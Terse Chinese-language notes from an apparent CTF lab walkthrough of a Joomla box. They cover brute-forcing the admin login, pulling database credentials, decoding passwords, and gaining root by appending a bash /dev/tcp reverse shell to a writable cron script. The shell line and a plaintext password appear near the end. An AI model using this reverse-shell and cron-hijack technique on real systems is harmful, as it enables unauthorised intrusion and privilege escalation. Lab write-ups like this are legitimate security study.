端口扫描
小丑
目录爆破
使用使用“ joomscan ”并列出版本,目录
咱们该一下/etc/host
查一下默认的账号密码(不行)
用bp爆破得到
现在是想反弹shell(我们进来是admin权限)
kali监听
咱们想先去枚举一下joomla目录下有没有有凭证密码的文件
在config.php里面发现
mysql -u joomla -p
show databases; use batjoke;
show tables; select * from taskforce;
有账号密码(base64)
???AllIHaveAreNegativeThoughts??? 解密密码
ssh连接 rob
有个help文件看看
看着像 rot13 CyberChef 解密
对密码进行”base64解码
得到用户“ abner ”的密码。
我们之前查看/etc/passwd是由abner penguin rob三个用户的,
find / -iname penguin 2>/dev/null 找与penguin有关的文件 -iname就是包含
利用abner的密码
账号:penguin,密码:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
cat PeopleAreStartingToNotice.txt
用pspy64
结合文件内容,发现.trash_old属于用户penguin,root组并且任何人都可执行。
echo "bash -c 'bash -i >& /dev/tcp/192.168.44.143/4444 0>&1'" >> .trash_old
要记得把exit 0给用#注释
kali监听